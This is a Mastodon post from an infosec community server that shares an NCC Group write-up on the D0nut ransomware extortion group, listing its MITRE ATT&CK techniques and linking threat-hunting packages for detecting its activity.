ioc.exchange is one of the many independent Mastodon servers you can use to participate in the fediverse.
INDICATORS OF COMPROMISE (IOC) InfoSec Community within the Fediverse. Newbies, experts, gurus - Everyone is Welcome! Instance is supposed to be fast and secure.

Administered by:

Server stats:

1.3K
active users

Just Another Blue Teamer

everyone!

As promised, the next installation of a "Unveiling the Dark Side: A Deep Dive into Active Ransomware Families" from the NCC Group! This time they focus on the extortion group who "demand ransoms in return for not leaking stolen data"(extortion) and then applying the double-extortion tactic where they exfiltrate the data THEN encrypt it. To add insult to injury they then demand ransom to decrypt AND to not leak the data. They use publicly available tools like to laterally move through the environment and Rclone to exfiltrate data. Plus, extra bonus points go to Ross Inman for the clever title! Enjoy and Happy Hunting!

D0nut encrypt me, I have a wife and no backups
research.nccgroup.com/2023/11/

NCC Group Research Blog · D0nut encrypt me, I have a wife and no backups Unveiling the Dark Side: A Deep Dive into Active Ransomware Families Author: Ross Inman (@rdi_x64) Introduction Our technical experts have written a blog series focused on Tactics, Techniques and P…

Notable MITRE ATT&CK TTPs (credit again goes to the author):
TA0002 - Execution
T1569.002 - System Services: Service Execution (Both Cobalt Strike and PsExec)

TA0003 - Persistence
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder

TA0004 - Privilege Escalation
T1055.002 - Process Injection: Portable Execution Injection

TA0005 - Defense Evasion
T1562.001 - Impair Defenses: Disable or Modify Tools

TA0008 - Lateral Movement
T1021.001 - Remote Services: Remote Desktop Protocol

TA0010 - Exfiltration
T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

TA0040 - Impact
T1490 - Inhibit System Recovery
T1486 - Data Encrypted for Impact

Some Cyborg Security Community Edition Hunt Packages to help you start your hunt for this type of activity:

Potential Exfiltration - Common Rclone Arguments
hunter.cyborgsecurity.io/resea

Shadow Copies Deletion Using Operating Systems Utilities
hunter.cyborgsecurity.io/resea

hunter.cyborgsecurity.ioCyborg Security | HUNTER